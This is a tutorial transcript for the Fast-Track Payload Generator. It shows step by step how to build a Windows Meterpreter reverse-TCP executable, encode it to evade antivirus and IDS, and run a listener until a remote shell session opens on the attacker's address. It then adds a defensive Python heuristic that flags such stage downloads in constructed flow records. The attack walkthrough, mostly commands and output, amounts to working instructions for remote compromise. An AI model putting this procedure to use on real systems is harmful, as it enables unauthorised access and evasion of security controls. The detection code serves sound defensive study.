Payload Generator
The Fast-Track Payload Generator creates custom Metasploit payloads for you with the click of a button. Remembering the msfpayload commands can be tricky, and Fast-Track's Payload Generator simplifies the process for you.
Fast-Track Main Menu:
Fast-Track - Where it's OK to finish in under 3 minutes...
Version: v4.0
Written by: David Kennedy (ReL1K)
http://www.securestate.com
http://www.thepentest.com
1. Fast-Track Updates
2. Autopwn Automation
3. Microsoft SQL Tools
4. Mass Client-Side Attack
5. Exploits
6. Binary to Hex Payload Converter
7. Payload Generator
8. Fast-Track Tutorials
9. Fast-Track Changelog
10. Fast-Track Credits
11. Exit
Enter the number: 7
Configuration file not detected, running default path.
Recommend running setup.py install to configure Fast-Track.
#####################################
### ###
### Metasploit Payload Generator ###
### ###
### Written by: Dave Kennedy ###
### aka ReL1K ###
### ###
#####################################
#####################################
The Metasploit Payload Generator is a simple tool to
make it extremely easy to generate a payload and listener
on the Metasploit framework. This does not actually
exploit any systems, it will generate a metasploit payload
for you and save it to an executable. You then need to
someone get it on the remote server by yourself and get it
to execute correctly.
This will also encode your payload to get past most AV and
IDS/IPS.
What payload do you want to generate:
Name: Description:
1. Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker.
2. Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker.
4. Windows Bind Shell Execute payload and create an accepting port on remote system.
5. Windows Reflective Reverse VNC Spawn a VNC server on victim and send back to attacker.
6. Windows Reflective Reverse Meterpreter Spawn a Meterpreter shell on victim through Reflective to attacker.
Enter choice (example 1-6): 2
Below is a list of encodings to try and bypass AV.
Select one of the below, Avoid_UTF8_tolower usually gets past them.
1. avoid_utf8_tolower
2. shikata_ga_nai
3. alpha_mixed
4. alpha_upper
5. call4_dword_xor
6. countdown
7. fnstenv_mov
8. jmp_call_additive
9. nonalpha
10. nonupper
11. unicode_mixed
12. unicode_upper
13. alpha2
14. No Encoding
Enter your choice : 2
Enter IP Address of the listener/attacker (reverse) or host/victim (bind shell): 10.211.55.130
Enter the port of the Listener: 9090
Do you want to create an EXE or Shellcode
1. Executable
2. Shellcode
Enter your choice: 1
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 310
Options: LHOST=10.211.55.130,LPORT=9090,ENCODING=shikata_ga_nai
A payload has been created in this directory and is named 'payload.exe'. Enjoy!
Do you want to start a listener to receive the payload yes or no: yes
Launching Listener...
***********************************************************************************************
Launching MSFCLI on 'exploit/multi/handler' with PAYLOAD='windows/meterpreter/reverse_tcp'
Listening on IP: 10.211.55.130 on Local Port: 9090 Using encoding: ENCODING=shikata_ga_nai
***********************************************************************************************
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
Notice that once the payload is created, Fast-Track can automatically set up a listener for you to accept the connection. Now all you have to do is get the executable on the remote system itself. Once executed:
***********************************************************************************************
Launching MSFCLI on 'exploit/multi/handler' with PAYLOAD='windows/meterpreter/reverse_tcp'
Listening on IP: 10.211.55.130 on Local Port: 9090 Using encoding: ENCODING=shikata_ga_nai
***********************************************************************************************
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (10.211.55.130:9090 -> 10.211.55.128:1078)
meterpreter >
We just learned how to easily create payloads using the Fast-Track framework and ultimately gain access to a system using a custom-created payload through the Metasploit Framework!
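From the defender's side, the handler log above shows what the target's network sees: the host opens a connection to port 9090 and is immediately sent a 216-byte intermediate stager and a 718336-byte stage. The following added example (not part of the original tutorial or of Fast-Track) flags that pattern in flow records; the record format, the thresholds and the expected-port list are assumptions, and the sample records are constructed.

```python
from dataclasses import dataclass

# Assumed tuning values (not from the page): adjust to your environment.
EXPECTED_PORTS = {53, 80, 443}   # outbound services this network normally uses
MIN_STAGE_BYTES = 500_000        # inbound volume that suggests a second stage
MAX_CLIENT_BYTES = 1_024         # the client itself has sent almost nothing
WINDOW_SECONDS = 5.0             # how soon after connect the download starts

@dataclass
class Flow:
    src: str               # internal host that opened the connection
    dst: str
    dst_port: int
    bytes_out: int         # client -> server at the start of the flow
    bytes_in: int          # server -> client at the start of the flow
    first_in_delay: float  # seconds from connect to first inbound payload byte

def parse_flow(line: str) -> Flow:
    """Parse one constructed CSV record: src,dst,dst_port,bytes_out,bytes_in,delay."""
    src, dst, port, b_out, b_in, delay = line.strip().split(",")
    return Flow(src, dst, int(port), int(b_out), int(b_in), float(delay))

def looks_like_stage_download(f: Flow) -> bool:
    """True when an outbound flow to an unexpected port is answered at once with a
    large server-first transfer, as when the handler in the log sends its stage."""
    return (f.dst_port not in EXPECTED_PORTS
            and f.bytes_out <= MAX_CLIENT_BYTES
            and f.bytes_in >= MIN_STAGE_BYTES
            and f.first_in_delay <= WINDOW_SECONDS)

def suspicious_flows(lines):
    """Return the flows that match the heuristic, skipping blanks and comments."""
    flows = [parse_flow(l) for l in lines if l.strip() and not l.startswith("#")]
    return [f for f in flows if looks_like_stage_download(f)]

# Constructed records; the first mirrors the addresses, port and sizes in the transcript.
SAMPLE = """\
# src,dst,dst_port,bytes_out,bytes_in,first_in_delay
10.211.55.128,10.211.55.130,9090,0,718552,0.4
10.211.55.128,10.211.55.1,443,1830,912004,0.9
10.211.55.129,10.211.55.130,9090,640,2200,0.2
10.211.55.131,10.211.55.130,8443,300,650000,42.0
"""

if __name__ == "__main__":
    for f in suspicious_flows(SAMPLE.splitlines()):
        print(f"ALERT {f.src} -> {f.dst}:{f.dst_port} received {f.bytes_in} bytes")
```

Only the first record is flagged: the others are excluded by an expected port, a small inbound volume, or a late transfer.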

